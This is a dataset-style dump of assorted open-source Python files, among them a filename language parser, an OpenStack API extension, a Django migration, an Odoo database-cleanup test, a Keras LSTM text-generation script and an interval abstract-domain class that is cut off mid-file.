| text (string, 6-947k chars) | repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (1 class) | license (15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) |
---|---|---|---|---|---|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2011 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import UnicodeMixin, base_text_type, u, s
from guessit.fileutils import load_file_in_same_dir
from guessit.country import Country
import re
import logging
__all__ = [ 'is_iso_language', 'is_language', 'lang_set', 'Language',
'ALL_LANGUAGES', 'ALL_LANGUAGES_NAMES', 'UNDETERMINED',
'search_language' ]
log = logging.getLogger(__name__)
# downloaded from http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
#
# Description of the fields:
# "An alpha-3 (bibliographic) code, an alpha-3 (terminologic) code (when given),
# an alpha-2 code (when given), an English name, and a French name of a language
# are all separated by pipe (|) characters."
_iso639_contents = load_file_in_same_dir(__file__, 'ISO-639-2_utf-8.txt')
# drop the BOM from the beginning of the file
_iso639_contents = _iso639_contents[1:]
language_matrix = [ l.strip().split('|')
for l in _iso639_contents.strip().split('\n') ]
# update information in the language matrix
language_matrix += [['mol', '', 'mo', 'Moldavian', 'moldave'],
['ass', '', '', 'Assyrian', 'assyrien']]
for lang in language_matrix:
# remove unused languages that shadow other common ones with a non-official form
if (lang[2] == 'se' or # Northern Sami shadows Swedish
lang[2] == 'br'): # Breton shadows Brazilian
lang[2] = ''
# add missing information
if lang[0] == 'und':
lang[2] = 'un'
if lang[0] == 'srp':
lang[1] = 'scc' # from OpenSubtitles
lng3 = frozenset(l[0] for l in language_matrix if l[0])
lng3term = frozenset(l[1] for l in language_matrix if l[1])
lng2 = frozenset(l[2] for l in language_matrix if l[2])
lng_en_name = frozenset(lng for l in language_matrix
for lng in l[3].lower().split('; ') if lng)
lng_fr_name = frozenset(lng for l in language_matrix
for lng in l[4].lower().split('; ') if lng)
lng_all_names = lng3 | lng3term | lng2 | lng_en_name | lng_fr_name
lng3_to_lng3term = dict((l[0], l[1]) for l in language_matrix if l[1])
lng3term_to_lng3 = dict((l[1], l[0]) for l in language_matrix if l[1])
lng3_to_lng2 = dict((l[0], l[2]) for l in language_matrix if l[2])
lng2_to_lng3 = dict((l[2], l[0]) for l in language_matrix if l[2])
# we only return the first given english name, hoping it is the most used one
lng3_to_lng_en_name = dict((l[0], l[3].split('; ')[0])
for l in language_matrix if l[3])
lng_en_name_to_lng3 = dict((en_name.lower(), l[0])
for l in language_matrix if l[3]
for en_name in l[3].split('; '))
# we only return the first given french name, hoping it is the most used one
lng3_to_lng_fr_name = dict((l[0], l[4].split('; ')[0])
for l in language_matrix if l[4])
lng_fr_name_to_lng3 = dict((fr_name.lower(), l[0])
for l in language_matrix if l[4]
for fr_name in l[4].split('; '))
# contains a list of exceptions: strings that should be parsed as a language
# but which are not in an ISO form
lng_exceptions = { 'unknown': ('und', None),
'inconnu': ('und', None),
'unk': ('und', None),
'un': ('und', None),
'gr': ('gre', None),
'greek': ('gre', None),
'esp': ('spa', None),
'español': ('spa', None),
'se': ('swe', None),
'po': ('pt', 'br'),
'pb': ('pt', 'br'),
'pob': ('pt', 'br'),
'br': ('pt', 'br'),
'brazilian': ('pt', 'br'),
'català': ('cat', None),
'cz': ('cze', None),
'ua': ('ukr', None),
'cn': ('chi', None),
'chs': ('chi', None),
'jp': ('jpn', None),
'scr': ('hrv', None)
}
def is_iso_language(language):
return language.lower() in lng_all_names
def is_language(language):
return is_iso_language(language) or language in lng_exceptions
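# Illustrative checks (a sketch relying on the exception table above): 'pob'
# is the OpenSubtitles code for Brazilian Portuguese, not an ISO-639 code,
# so only the exception-aware helper accepts it.
# >>> is_iso_language('pob')
# False
# >>> is_language('pob')
# True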
def lang_set(languages, strict=False):
"""Return a set of guessit.Language created from their given string
representation.
if strict is True, then this will raise an exception if any language
could not be identified.
"""
return set(Language(l, strict=strict) for l in languages)
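# Example usage (a sketch, assuming the bundled ISO-639 table loaded above):
# >>> sorted(s(l.english_name) for l in lang_set(['fr', 'eng', 'spanish']))
# ['English', 'French', 'Spanish']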
class Language(UnicodeMixin):
"""This class represents a human language.
You can initialize it with pretty much anything, as it knows conversion
from ISO-639 2-letter and 3-letter codes, English and French names.
You can also distinguish languages for specific countries, such as
Portuguese and Brazilian Portuguese.
There are various properties on the language object that give you the
representation of the language for a specific usage, such as .alpha3
to get the ISO 3-letter code, or .opensubtitles to get the OpenSubtitles
language code.
>>> Language('fr')
Language(French)
>>> s(Language('eng').french_name)
'anglais'
>>> s(Language('pt(br)').country.english_name)
'Brazil'
>>> s(Language('Español (Latinoamérica)').country.english_name)
'Latin America'
>>> Language('Spanish (Latin America)') == Language('Español (Latinoamérica)')
True
>>> s(Language('zz', strict=False).english_name)
'Undetermined'
>>> s(Language('pt(br)').opensubtitles)
'pob'
"""
    _with_country_regexp = re.compile(r'(.*)\((.*)\)')
    _with_country_regexp2 = re.compile(r'(.*)-(.*)')
def __init__(self, language, country=None, strict=False, scheme=None):
language = u(language.strip().lower())
with_country = (Language._with_country_regexp.match(language) or
Language._with_country_regexp2.match(language))
if with_country:
self.lang = Language(with_country.group(1)).lang
self.country = Country(with_country.group(2))
return
self.lang = None
self.country = Country(country) if country else None
# first look for scheme specific languages
if scheme == 'opensubtitles':
if language == 'br':
self.lang = 'bre'
return
elif language == 'se':
self.lang = 'sme'
return
elif scheme is not None:
log.warning('Unrecognized scheme: "%s" - Proceeding with standard one' % scheme)
# look for ISO language codes
if len(language) == 2:
self.lang = lng2_to_lng3.get(language)
elif len(language) == 3:
self.lang = (language
if language in lng3
else lng3term_to_lng3.get(language))
else:
self.lang = (lng_en_name_to_lng3.get(language) or
lng_fr_name_to_lng3.get(language))
# general language exceptions
if self.lang is None and language in lng_exceptions:
lang, country = lng_exceptions[language]
self.lang = Language(lang).alpha3
self.country = Country(country) if country else None
msg = 'The given string "%s" could not be identified as a language' % language
if self.lang is None and strict:
raise ValueError(msg)
if self.lang is None:
log.debug(msg)
self.lang = 'und'
@property
def alpha2(self):
return lng3_to_lng2[self.lang]
@property
def alpha3(self):
return self.lang
@property
def alpha3term(self):
return lng3_to_lng3term[self.lang]
@property
def english_name(self):
return lng3_to_lng_en_name[self.lang]
@property
def french_name(self):
return lng3_to_lng_fr_name[self.lang]
@property
def opensubtitles(self):
if self.lang == 'por' and self.country and self.country.alpha2 == 'br':
return 'pob'
elif self.lang in ['gre', 'srp']:
return self.alpha3term
return self.alpha3
@property
def tmdb(self):
if self.country:
return '%s-%s' % (self.alpha2, self.country.alpha2.upper())
return self.alpha2
def __hash__(self):
return hash(self.lang)
def __eq__(self, other):
if isinstance(other, Language):
return self.lang == other.lang
if isinstance(other, base_text_type):
try:
return self == Language(other)
except ValueError:
return False
return False
def __ne__(self, other):
return not self == other
def __nonzero__(self):
return self.lang != 'und'
def __unicode__(self):
if self.country:
return '%s(%s)' % (self.english_name, self.country.alpha2)
else:
return self.english_name
def __repr__(self):
if self.country:
return 'Language(%s, country=%s)' % (self.english_name, self.country)
else:
return 'Language(%s)' % self.english_name
UNDETERMINED = Language('und')
ALL_LANGUAGES = frozenset(Language(lng) for lng in lng_all_names) - frozenset([UNDETERMINED])
ALL_LANGUAGES_NAMES = lng_all_names
def search_language(string, lang_filter=None):
"""Looks for language patterns, and if found return the language object,
its group span and an associated confidence.
you can specify a list of allowed languages using the lang_filter argument,
as in lang_filter = [ 'fr', 'eng', 'spanish' ]
>>> search_language('movie [en].avi')
(Language(English), (7, 9), 0.8)
>>> search_language('the zen fat cat and the gay mad men got a new fan', lang_filter = ['en', 'fr', 'es'])
(None, None, None)
"""
# list of common words which could be interpreted as languages, but which
# are far too common to be able to say they represent a language in the
    # middle of a string (where they most likely carry their common meaning)
lng_common_words = frozenset([
# english words
'is', 'it', 'am', 'mad', 'men', 'man', 'run', 'sin', 'st', 'to',
'no', 'non', 'war', 'min', 'new', 'car', 'day', 'bad', 'bat', 'fan',
'fry', 'cop', 'zen', 'gay', 'fat', 'cherokee', 'got', 'an', 'as',
'cat', 'her', 'be', 'hat', 'sun', 'may', 'my', 'mr',
# french words
'bas', 'de', 'le', 'son', 'vo', 'vf', 'ne', 'ca', 'ce', 'et', 'que',
'mal', 'est', 'vol', 'or', 'mon', 'se',
# spanish words
'la', 'el', 'del', 'por', 'mar',
# other
'ind', 'arw', 'ts', 'ii', 'bin', 'chan', 'ss', 'san', 'oss', 'iii',
'vi'
])
sep = r'[](){} \._-+'
if lang_filter:
lang_filter = lang_set(lang_filter)
slow = ' %s ' % string.lower()
confidence = 1.0 # for all of them
for lang in lng_all_names:
if lang in lng_common_words:
continue
pos = slow.find(lang)
if pos != -1:
end = pos + len(lang)
# make sure our word is always surrounded by separators
if slow[pos - 1] not in sep or slow[end] not in sep:
continue
language = Language(slow[pos:end])
if lang_filter and language not in lang_filter:
continue
# only allow those languages that have a 2-letter code, those who
# don't are too esoteric and probably false matches
if language.lang not in lng3_to_lng2:
continue
# confidence depends on lng2, lng3, english name, ...
if len(lang) == 2:
confidence = 0.8
elif len(lang) == 3:
confidence = 0.9
else:
# Note: we could either be really confident that we found a
# language or assume that full language names are too
# common words
confidence = 0.3 # going with the low-confidence route here
return language, (pos - 1, end - 1), confidence
return None, None, None
| nabsboss/CouchPotatoServer | libs/guessit/language.py | Python | gpl-3.0 | 13,102 | 0.003207 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Midokura Japan K.K.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova import log as logging
LOG = logging.getLogger('nova.api.openstack.compute.contrib.server_start_stop')
class ServerStartStopActionController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(ServerStartStopActionController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.action('os-start')
def _start_server(self, req, id, body):
"""Start an instance. """
context = req.environ['nova.context']
try:
LOG.debug(_("start instance %r"), id)
instance = self.compute_api.get(context, id)
self.compute_api.start(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
@wsgi.action('os-stop')
def _stop_server(self, req, id, body):
"""Stop an instance."""
context = req.environ['nova.context']
try:
LOG.debug(_("stop instance %r"), id)
instance = self.compute_api.get(context, id)
self.compute_api.stop(context, instance)
except exception.ApiError, e:
raise webob.exc.HTTPBadRequest(explanation=e.message)
except exception.NotAuthorized, e:
raise webob.exc.HTTPUnauthorized()
return webob.Response(status_int=202)
class Server_start_stop(extensions.ExtensionDescriptor):
"""Start/Stop instance compute API support"""
name = "ServerStartStop"
namespace = "http://docs.openstack.org/compute/ext/servers/api/v1.1"
    updated = "2012-01-23T00:00:00+00:00"
def get_controller_extensions(self):
controller = ServerStartStopActionController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
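# Illustrative usage (hypothetical tenant and server ids): once this extension
# is loaded, the @wsgi.action decorators above route the action body's key to
# the matching handler, and a 202 response means the request was accepted.
#
#   POST /v1.1/<tenant_id>/servers/<server_id>/action
#   {"os-start": null}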
| rcbops/nova-buildpackage | nova/api/openstack/compute/contrib/server_start_stop.py | Python | apache-2.0 | 2,721 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def populate_target_amount(apps, schema_editor):
Entry = apps.get_model("momentum", "Entry")
for entry in Entry.objects.all():
entry.target_amount = entry.goal.target_amount
entry.save()
class Migration(migrations.Migration):
dependencies = [
('momentum', '0009_entry_target_amount'),
]
operations = [
migrations.RunPython(populate_target_amount),
]
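# Note: as written this migration is irreversible. On Django >= 1.8 a
# reversible sketch would pass a no-op callable for the backwards direction:
# migrations.RunPython(populate_target_amount, migrations.RunPython.noop)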
| mod2/momentum | momentum/migrations/0010_target_data_migration.py | Python | mit | 517 | 0.003868 |
"""Builder for websites."""
import string
from regolith.dates import date_to_float
doc_date_key = lambda x: date_to_float(
x.get("year", 1970), x.get("month", "jan")
)
ene_date_key = lambda x: date_to_float(
x.get("end_year", 4242), x.get("end_month", "dec")
)
category_val = lambda x: x.get("category", "<uncategorized>")
level_val = lambda x: x.get("level", "<no-level>")
id_key = lambda x: x.get("_id", "")
def date_key(x):
if "end_year" in x:
v = date_to_float(
x["end_year"], x.get("end_month", "jan"), x.get("end_day", 0)
)
elif "year" in x:
v = date_to_float(x["year"], x.get("month", "jan"), x.get("day", 0))
elif "begin_year" in x:
v = date_to_float(
x["begin_year"], x.get("begin_month", "jan"), x.get("begin_day", 0)
)
else:
raise KeyError("could not find year in " + str(x))
return v
POSITION_LEVELS = {
"": -1,
"editor": -1,
"unknown": -1,
"undergraduate research assistant": 1,
"intern": 1,
"masters research assistant": 2,
"visiting student": 1,
"graduate research assistant": 3,
"teaching assistant": 3,
"research assistant": 2,
"post-doctoral scholar": 4,
"research fellow": 4,
"assistant scientist": 4,
"assistant lecturer": 4,
"lecturer": 5,
"research scientist": 4.5,
"associate scientist": 5,
"adjunct scientist": 5,
"senior assistant lecturer": 5,
"research associate": 5,
"reader": 5,
"ajunct professor": 5,
"adjunct professor": 5,
"consultant": 5,
"programer": 5,
"programmer": 5,
"visiting scientist": 6,
"research assistant professor": 4,
"assistant professor": 8,
"assistant physicist": 8,
"associate professor": 9,
"associate physicist": 9,
"professor emeritus": 9,
"visiting professor": 9,
"manager": 10,
"director": 10,
"scientist": 10,
"engineer": 10,
"physicist": 10,
"professor": 11,
"president": 10,
"distinguished professor": 12
}
def position_key(x):
"""Sorts a people based on thier position in the research group."""
pos = x.get("position", "").lower()
first_letter_last = x.get("name", "zappa").rsplit(None, 1)[-1][0].upper()
backward_position = 26 - string.ascii_uppercase.index(first_letter_last)
return POSITION_LEVELS.get(pos, -1), backward_position
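# Worked example (a sketch with made-up people): position_key returns
# (seniority level, reverse-alphabetical rank of the last initial), so a
# descending sort puts senior positions first and breaks ties by last name:
#
# people = [{"name": "Alan Turing", "position": "intern"},
#           {"name": "Ada Lovelace", "position": "professor"}]
# people.sort(key=position_key, reverse=True)  # Lovelace (professor) first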
| scopatz/regolith | regolith/sorters.py | Python | cc0-1.0 | 2,389 | 0.002093 |
#!/usr/bin/env python3
header = """
..
DO NOT EDIT: This file was automatically generated by running doc/acknowledge.py
Edit doc/acknowledge.py, doc/funding.csv, and doc/citing-pism.bib
"""
acknowledgement = """
Acknowledging PISM funding sources
----------------------------------
If you use PISM in a publication then we ask for an acknowledgement of funding and a
citation. However, unless PISM developers are involved in the preparation of the
publication at the usual co-author level, we do not expect co-authorship on PISM-using
papers.
To acknowledge PISM funding please include the statement:
"""
citing = """
Citing
------
To cite PISM please use at least one of Bueler and Brown (2009) or Winkelmann et al.
(2011), below, as appropriate to the application.
Do not forget to specify the PISM *version* you use. If your results came from source code
modifications to PISM then we request that your publication say so explicitly.
If your study relies heavily on certain PISM sub-models (such as hydrology, calving,
fracture mechanics, thermodynamics) please contact the corresponding author/developer for
information on additional citations.
.. code::
"""
import csv
import time
import sys
import argparse
parser = argparse.ArgumentParser()
parser.description = '''Generate a funding acknowledgment string.'''
parser.add_argument("--manual", action="store_true")
options = parser.parse_args()
year = time.gmtime(time.time())[0]
funding = {}
with open("funding.csv", "r") as f:
    reader = csv.reader(f, skipinitialspace=True, quoting=csv.QUOTE_ALL)
    for row in reader:
        start_year, end_year, agency, number, _ = row
        try:
            start_year = int(start_year)
            end_year = int(end_year)
        except ValueError:
            continue
        # skip grants for which we don't have a number (yet)
        if number.strip() == "":
            continue
        if start_year <= year <= end_year:
            funding.setdefault(agency, []).append(number)
def join(strings):
assert len(strings) > 0
if len(strings) == 1:
return strings[0]
elif len(strings) == 2:
return "{} and {}".format(strings[0], strings[1])
else:
return join(["{}, {}".format(strings[0], strings[1]),
join(strings[2:])])
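# For example (pure logic on the recursive join above):
# join(["NSF"]) -> 'NSF'
# join(["NSF", "NASA"]) -> 'NSF and NASA'
# join(["NSF", "NASA", "DOE"]) -> 'NSF, NASA and DOE'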
grants = []
for k, v in funding.items():
grant = "grant"
if len(v) > 1:
grant = "grants"
grants.append("{agency} {grant} {number}".format(agency=k,
grant=grant,
number=join(v)))
if options.manual:
print(header)
print("""
Development of PISM is supported by {grants}.""".format(grants=join(grants)))
else:
print(header)
print(acknowledgement)
print("""
Development of PISM is supported by {grants}.
""".format(grants=join(grants)))
print(citing)
with open("citing-pism.bib") as f:
for line in f:
sys.stdout.write(" {}".format(line))
| pism/pism | doc/acknowledge.py | Python | gpl-3.0 | 3,113 | 0.004497 |
# -*- coding: utf-8 -*-
# © 2016 Therp BV <http://therp.nl>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from psycopg2 import ProgrammingError
from openerp.modules.registry import RegistryManager
from openerp.tools import config
from openerp.tests.common import TransactionCase, at_install, post_install
# Use post_install to get all models loaded more info: odoo/odoo#13458
@at_install(False)
@post_install(True)
class TestDatabaseCleanup(TransactionCase):
def setUp(self):
super(TestDatabaseCleanup, self).setUp()
self.module = None
self.model = None
def test_database_cleanup(self):
# create an orphaned column
self.cr.execute(
'alter table res_partner add column database_cleanup_test int')
# We need use a model that is not blocked (Avoid use res.users)
partner_model = self.env['ir.model'].search([
('model', '=', 'res.partner')], limit=1)
purge_columns = self.env['cleanup.purge.wizard.column'].create({
'purge_line_ids': [(0, 0, {
'model_id': partner_model.id, 'name': 'database_cleanup_test'}
)]})
purge_columns.purge_all()
# must be removed by the wizard
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
cr.execute('select database_cleanup_test from res_partner')
# create a data entry pointing nowhere
self.cr.execute('select max(id) + 1 from res_users')
self.env['ir.model.data'].create({
'module': 'database_cleanup',
'name': 'test_no_data_entry',
'model': 'res.users',
'res_id': self.cr.fetchone()[0],
})
purge_data = self.env['cleanup.purge.wizard.data'].create({})
purge_data.purge_all()
# must be removed by the wizard
with self.assertRaises(ValueError):
self.env.ref('database_cleanup.test_no_data_entry')
# create a nonexistent model
self.model = self.env['ir.model'].create({
'name': 'Database cleanup test model',
'model': 'x_database.cleanup.test.model',
})
self.env.cr.execute(
'insert into ir_attachment (name, res_model, res_id, type) values '
"('test attachment', 'database.cleanup.test.model', 42, 'binary')")
self.registry.models.pop('x_database.cleanup.test.model')
self.registry._pure_function_fields.pop(
'x_database.cleanup.test.model')
purge_models = self.env['cleanup.purge.wizard.model'].create({})
with self.assertRaisesRegexp(KeyError,
'x_database.cleanup.test.model'):
# TODO: Remove with-assert of KeyError after fix:
# https://github.com/odoo/odoo/pull/13978/files#r88654967
purge_models.purge_all()
# must be removed by the wizard
self.assertFalse(self.env['ir.model'].search([
('model', '=', 'x_database.cleanup.test.model'),
]))
# create a nonexistent module
self.module = self.env['ir.module.module'].create({
'name': 'database_cleanup_test',
'state': 'to upgrade',
})
purge_modules = self.env['cleanup.purge.wizard.module'].create({})
# this reloads our registry, and we don't want to run tests twice
# we also need the original registry for further tests, so save a
# reference to it
original_registry = RegistryManager.registries[self.env.cr.dbname]
config.options['test_enable'] = False
purge_modules.purge_all()
config.options['test_enable'] = True
# must be removed by the wizard
self.assertFalse(self.env['ir.module.module'].search([
('name', '=', 'database_cleanup_test'),
]))
# reset afterwards
RegistryManager.registries[self.env.cr.dbname] = original_registry
# create an orphaned table
self.env.cr.execute('create table database_cleanup_test (test int)')
purge_tables = self.env['cleanup.purge.wizard.table'].create({})
purge_tables.purge_all()
with self.assertRaises(ProgrammingError):
with self.registry.cursor() as cr:
self.env.cr.execute('select * from database_cleanup_test')
def tearDown(self):
super(TestDatabaseCleanup, self).tearDown()
with self.registry.cursor() as cr2:
# Release blocked tables with pending deletes
self.env.cr.rollback()
if self.module:
cr2.execute(
"DELETE FROM ir_module_module WHERE id=%s",
(self.module.id,))
if self.model:
cr2.execute(
"DELETE FROM ir_model WHERE id=%s",
(self.model.id,))
cr2.commit()
| be-cloud-be/horizon-addons | server-tools/database_cleanup/tests/test_database_cleanup.py | Python | agpl-3.0 | 4,939 | 0 |
from .howdoi import command_line_runner
command_line_runner()
| gleitz/howdoi | howdoi/__main__.py | Python | mit | 63 | 0 |
from django.core.urlresolvers import reverse
from django.test import TestCase
class SmokeTestMeanCoach(TestCase):
def test_index_page_returns_200(self):
resp = self.client.get(reverse('meancoach:index'))
assert resp.status_code == 200
| dev-coop/meancoach | meancoach_project/apps/meancoach/tests/smoke_tests.py | Python | mit | 258 | 0 |
#!/usr/bin/python
# coding: utf8
import os
import subprocess
from {% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}.commands.base import BaseCommand
from {% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %} import PROJECT_DIR
class Configure(BaseCommand):
def execute(self):
os.chdir(os.path.join(PROJECT_DIR, 'build'))
subprocess.run(['cmake', PROJECT_DIR])
| antoinedube/numeric-cookiecutter | {{cookiecutter.namespace+'.'+cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/commands/configure.py | Python | gpl-3.0 | 571 | 0.003503 |
import os
import sys
import re
import numpy as np
import json
import pickle
from string import ascii_letters
from keras.models import Sequential, model_from_json
from keras.layers import Dense, Activation, Dropout
from keras.layers import LSTM
from ivanatrumpalot import clean_text, predict, sample
# This code is heavily influenced by the Keras example code on LSTM for text generation :
# https://github.com/fchollet/keras/blob/master/examples/lstm_text_generation.py
# USAGE :
# python train_lstm.py [mode]
# If no arguments are passed, this will train a new model, saving the model's architecture
# to model.json and its weights to weights.h5.
# If [mode] is passed, valid options are "extend" and "predict".
# If the string "extend" is passed, the model architecture and weights saved
# previously by train_lstm.py (model.json and weights.h5) are loaded and
# training continues from there.
# If the string "predict" is passed, the saved model is loaded and used only
# to generate text, without further training.
# Code directory
os.chdir("/root/ivanatrumpalot/code")
# Read and clean corpus
text = clean_text(open("../data/trump_corpus").read())
# Corpus length
print("Corpus : {} characters, approximately {} sentences.".format(len(text), len(text.split("."))))
# Generate a dictionaries mapping from characters in our alphabet to an index, and the reverse
alphabet = set(text).union(set(ascii_letters)).union(set("1234567890"))
alphabet_size = len(alphabet)
alphabet_indices = dict((c, i) for i, c in enumerate(alphabet))
indices_alphabet = dict((i, c) for i, c in enumerate(alphabet))
print("Size of the alphabet : {} characters.".format(alphabet_size))
# Generate sequences of characters that the RNN will use to predict the next character.
primer_length = 50
step = 3
sentences = []
next_character = []
for i in range(0, len(text) - primer_length, step):
sentences.append(text[i : i + primer_length])
next_character.append(text[i + primer_length])
print("Number of sequences generated from the corpus : {}.".format(len(sentences)))
# Vectorise the text sequences : go from N sentences of length primer_length to
# a binary array of size (N, primer_length, alphabet_size). Do the same for the
# next_character array.
print("Vectorising.")
X = np.zeros((len(sentences), primer_length, alphabet_size), dtype=np.bool)
y = np.zeros((len(sentences), alphabet_size), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, alphabet_indices[char]] = 1
y[i, alphabet_indices[next_character[i]]] = 1
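# Shape sanity check (illustrative): every primer is one-hot encoded per
# character, so the arrays built above satisfy:
assert X.shape == (len(sentences), primer_length, alphabet_size)
assert y.shape == (len(sentences), alphabet_size)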
# Pickle the necessary objects for future prediction
required_objects = { "alphabet" : alphabet,
"alphabet_indices" : alphabet_indices,
"indices_alphabet" : indices_alphabet,
"primer_length" : primer_length
}
with open("required_objects.pickle", "wb") as f:
pickle.dump(required_objects, f)
# The current model is a four-layer LSTM network with a dropout layer between each hidden layer.
print("Building the model.")
model = Sequential()
model.add(LSTM(128, return_sequences=True, init="glorot_uniform",
input_shape=(primer_length, len(alphabet))))
model.add(Dropout(0.2))
model.add(LSTM(256, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=True, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=False, init="glorot_uniform"))
model.add(Dropout(0.2))
model.add(Dense(len(alphabet)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
model.summary()
# Train the model in 49 iterations of five epochs each (~245 epochs total),
# sampling some generated text after every iteration.
# Save the model every five epochs, just in case training is interrupted
for iteration in range(1, 50):
print("\n" + "-" * 50)
print("Iteration {}".format(iteration))
# Train the model for five epochs
model.fit(X, y, batch_size=128, nb_epoch=5, shuffle=True)
# Pick a random part of the text to use as a prompt
start_index = np.random.randint(0, len(text) - primer_length - 1)
# For various energies in the probability distribution,
# create some 200-character sample strings
for diversity in [0.2, 0.5, 1.0, 1.2]:
print("\n----- Diversity : {}".format(diversity))
generated = ""
sentence = text[start_index : start_index + primer_length]
generated += sentence
print("----- Generating with prompt : {}".format(sentence))
sys.stdout.write(generated)
# Generate 100 characters
for i in range(100):
x = np.zeros((1, primer_length, len(alphabet)))
for t, char in enumerate(sentence):
x[0, t, alphabet_indices[char]] = 1.
predictions = model.predict(x, verbose=0)[0]
next_index = sample(predictions, diversity)
next_char = indices_alphabet[next_index]
generated += next_char
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print("\n")
# Save the model architecture and weights to file
model.save_weights("weights.h5", overwrite=True)
with open("model.json", "w") as f:
f.write(model.to_json())
| QCaudron/ivanatrumpalot | code/train_lstm.py | Python | mit | 5,169 | 0.003289 |
import os.path
import shutil
try:
import OWGUI
except ImportError:
print "Orange could not be imported."
try:
import pynopticon
except ImportError:
print "Pynopticon could not be imported, you need to install it first."
def link_to_orange():
orangeWidgetsPath = os.path.join(os.path.split(OWGUI.__file__)[0], 'Pynopticon')
pncWidgetsPath = os.path.join(pynopticon.__path__[0], 'widgets')
print "Copying pynopticon widgets to orange widgets directory..."
shutil.copytree(pncWidgetsPath, orangeWidgetsPath)
print "Successfull"
if __name__=='__main__':
link_to_orange()
| hksonngan/pynopticon | src/pynopticon/link_to_orange.py | Python | gpl-3.0 | 628 | 0.012739 |
from collections import defaultdict
def check_for_hits(planets, counts):
total = 0
for planet in planets():
if counts(planet):
total += 1
return total
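# Worked example (sketch): planets at x=3 with y in {1, 5, 9}, and a ship at
# (3, 2) firing "U" counts everything strictly above it:
# check_for_hits(lambda: [1, 5, 9], lambda j: j > 2) -> 2 (y=5 and y=9)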
def parse():
actions = {"U": (lambda: map_x[x], lambda j: j > y),
"D": (lambda: map_x[x], lambda j: j < y),
"L": (lambda: map_y[y], lambda j: j < x),
"R": (lambda: map_y[y], lambda j: j > x) }
for x in range(1, 8):
file_name = "%02d" % x
input_file = open(file_name + ".in")
lines = input_file.read().splitlines()
planets, ships = lines[0].split(" ")
map_x = defaultdict(list)
map_y = defaultdict(list)
for i in range(1, int(planets) + 1):
x, y = [int(k) for k in lines[i].split(" ")]
map_x[x] += [y]
map_y[y] += [x]
start = int(planets) + 1
hit_list = []
for i in range(start, start + int(ships)):
x, y, direction = lines[i].split(" ")
x, y = int(x), int(y)
            action = actions.get(direction)
            if not action:
                raise ValueError("Invalid direction value %s" % direction)
hits = check_for_hits(action[0], action[1])
hit_list.append(hits)
output_file = open(file_name + ".out")
should_be = [int(k) for k in output_file.readlines()]
assert hit_list == should_be
if __name__ == '__main__':
parse()
| Krigu/python_fun | Pland1/Parser.py | Python | gpl-3.0 | 1,456 | 0.000687 |
# Create your views here.
from django.contrib.auth.decorators import login_required
from core.models import *
from django.http import HttpResponse
from core.services import watch_services
from django.utils.translation import ugettext as _
@login_required
def watchIssue(request, issue_id):
watch_services.watch_issue(request.user, int(issue_id), Watch.WATCHED)
return HttpResponse('WATCHING')
@login_required
def unwatchIssue(request, issue_id):
watch_services.unwatch_issue(request.user, int(issue_id))
return HttpResponse('NOT_WATCHING')
| stonestone/stonefreedomsponsors | djangoproject/core/views/watch_views.py | Python | agpl-3.0 | 558 | 0.003584 |
from copy import deepcopy
from math import inf
from numbers import Number
from typing import List, Union
from abstract_domains.lattice import BottomMixin
from abstract_domains.numerical.numerical import NumericalMixin
from abstract_domains.state import State
from abstract_domains.store import Store
from core.expressions import *
from core.expressions_tools import ExpressionVisitor
def _auto_convert_numbers(func):
def func_wrapper(self, other: Union[Number, 'Interval']):
if isinstance(other, Number):
other = Interval(other, other)
return func(self, other)
return func_wrapper
def _check_types(func):
def func_wrapper(self, other: 'Interval'):
if not issubclass(self.__class__, Interval) or not issubclass(other.__class__, Interval):
return NotImplemented
return func(self, other)
return func_wrapper
def _check_non_empty(func):
def func_wrapper(self, other: 'Interval'):
if self.empty() or other.empty():
raise ValueError("Empty intervals are not comparable!")
return func(self, other)
return func_wrapper
class Interval:
def __init__(self, lower=-inf, upper=inf):
"""Create an interval lattice for a single variable.
"""
super().__init__()
assert lower is not None and upper is not None
self._lower = lower
self._upper = upper
@staticmethod
def from_constant(constant):
